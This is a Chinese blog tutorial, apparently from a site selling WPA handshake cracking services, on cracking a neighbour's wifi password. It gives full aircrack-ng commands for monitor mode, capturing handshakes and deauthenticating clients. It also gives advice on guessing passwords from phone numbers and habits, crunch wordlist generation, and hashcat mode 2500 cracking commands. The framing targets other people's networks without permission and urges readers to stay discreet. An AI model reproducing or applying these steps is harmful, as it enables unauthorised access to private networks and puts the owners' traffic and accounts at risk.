如何破解隔壁小姐姐的wifi密码

caocao1年前教程189

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi

各位好 又见面了 我是曹操 今天给大家带来一篇新的教程

希望各位细心学习 低调用网

hashcat怎么设置密码

一共分为三步 第一步:抓包 第二步:猜密码 第三步:跑字典 第一步:抓包 我使用的是kali linux,工具比较全。 工具:aircrack-ng(linux环境) aircrack-ng-命令示例 ifconfig #查看网卡 airmon-ng check kill #为了保证aircrack套件在运行的时候不被其他进程所干扰 iwconfig #使用此命令可查看无线网卡的当前工作模式 airmon-ng start wlan0 #开启无线网卡的监听模式 ifconfig -a #初始化网卡 airodump-ng wlan0mon #扫描wifi,获取AP MAC和信道(频道)等信息 airodump-ng -c 1 --bssid 7C:B3:7B:12:7E:71 -w /root/Desktop/wifi wlan0mon #抓包,使用wlan0mon网卡监控MAC地址是7C:B3:7B:12:7E:71的AP,并把抓的包保存在/root/Desktop/wifi文件夹中。 Explain: -c:信道(信道错了,可能就扫描不到AP下的设备MAC) --bssid指定路由器bssid (MAC地址) -w指定抓取的数据包保存位置 aireplay-ng -0 0 -c 94:65:2D:9C:E4:E0 -a 7C:B3:7B:12:7E:71 wlan0mon 注意:这里需要另开一个终端,来执行此命令,与上一个命令,一起配合。 #攻击7C:B3:7B:12:7E:71下的94:65:2D:9C:E4:E0设备,强制取消用户身份验证攻击抓取wpa握手包。 explain: -c:攻击的设备MAC -a: AP MAC aireplay-ng --deauth 15 -a 7C:B3:7B:12:7E:71 wlan0mon #攻击7C:B3:7B:12:7E:71 AP下的所有设备 成功后显示如图: 到此现在/root/Desktop/wifi这个文件夹中已经有包含密码的加密数据了。 aireplay-ng -1 -e -a -h #虚假身份验证,这条命令具体意识我也不是特别清楚 aireplay-ng -9 wlan0mon #注入质量测试 airmon-ng stop wlan0mon #停止监控 第二步:猜密码 现在有了加密的数据,当下要做的就是猜那个密码大概什么了,这个破解成功还是失败一个最大的变数。 在不同类型的人,和地方这个密码都有一定的规律可循。比如某地的小区一般是直接使用手机号码作为wifi的密码。有些人呢喜欢使用人名的简写加上生日,或者有些更加简单那种1到9的这种常用的弱密码。在网络中下载弱密码字典,可以先试试。 先猜,之后就根据所想来一个个跑字典。字典中可能就包含可能出现的密码。 特殊一点的密码,与个人习惯相关,这个时候就需要有一个特定的规则字典来跑,但是这种字典,一般只能自己生成一个了。 总的思路就是对于完全没有头绪的密码,先跑弱密码字典,八位数字典,然后可以试试当地的手机号码。如果还没有跑出来,基本就没有什么戏了。毕竟对wifi主人的设置习惯一无所知。有头绪的可以自己生成一个字典跑。所以我们自己设置密码的时候,不想被人蹭,必要的字符可能就无解了。除非人家可能猜得到你的密码设置习惯。 说道密码设置习惯,可能大多数的人在不同的应用下设置的密码可能大多都很相似,甚至为了省事密码可能都一样的,也不是没有可能。人家可能破的只是wifi密码,可能无意间连啥QQ密码都可能泄露了,哈哈。 字典(我没有试过) 链接: 提取码:mz2o 字典生成器 工具一:crunch Usage: crunch [options] 工具二:全国手机号码字典生成器 链接: 提取码:1rtx 第三步:跑字典 aircrack-ng -w /root/Desktop/rockyou/rockyou.txt /root/Desktop/-01.cap #aircrack进行密码穷举,慢,用于字典不大的情况下。 Explan:-w字典路径, 一个八位纯数字的字典大概是八百来兆也就是一亿个密码,用cpu来跑我电脑实测已经超过了五个小时了,特别的慢。慢就换一种工具试试,比如hashcat,最多十分钟搞定,前提是你硬件过得去。 Hashcat(5.1.0)windowns环境 下载: 语法 hashcat64.exe [options]… hash|hashfile|hccapxfile [dictionary|mask|directory]… hashcat64.exe -m 2500 #进入hashcat所在路径,输入命令,默认使用字典模式 hashcat64.exe -m 2500 -a3 2.hccapx ?d?d?d?d?d?d?d?dpause #掩码破解 ================================常用命令============================== --hwmon disable | | 禁用温度和风扇转速读取和触发 | --hwmon-disable | Num | 如果温度达到X摄氏度,则中止——hwmon temp abort=100 -s | Num | 从开头跳过X个单词 |-s 1000000 --potfile-path | File | 密码文件:potfile的特定路径 |--potfile-path=(默认是程序中的poflie文件) --show | | 查看密码 ==================================================================== 转换文件格式 hashcat只能识别hccatx的格式,所以抓完包之后的格式是cap需要转换。 在线转换工具: 软件转换(命令行操作): hashcat-字典爆破-示例 U盘路径:F:\myflie\uncoverwifi\hashcat-5.1.0\hashcat-5.1.0 cd F:\myflie\uncoverwifi\hashcat-5.1.0\hashcat-5.1.0 #进入hashcat所在路径 hashcat64.exe -m 2500 --hwmon-disable --potfile-path=F:\myflie\uncoverwifi\hccatx\uncover\破解.txt F:\myflie\uncoverwifi\hccatx\wifi1.hccapx F:\myflie\uncoverwifi\dir\dir.txt #破解模式为字典破解,散列类型为2500(对应WPA-EAPOL-PBKDF2,也就是wifi加密的算法),加上破解后密码存放的文件位置,接着是wifi1加密的文件路径,最后是字典dir.txt所在的路径。 破解了就可以在破解.txt中看到密码。

相关文章

Kali Linux破解wifi密码教程(无须外置网卡)

Kali Linux破解wifi密码教程(无须外置网卡)

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 关键词:Kali Lin...

请关闭路由器的wps功能

请关闭路由器的wps功能

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 不管你设多长。只要你的路...

网络攻击之避免中间人攻击的解决方式

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 中间人攻击(MITM)...

AutoCAD 2020中文版下载(附详细安装图文教程)

在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 曹操wifi 各位好 又见面了 我是曹操 今天给大家带来一篇新的教程 希望各位细心学习 低调用网 美国AutoDesk公司...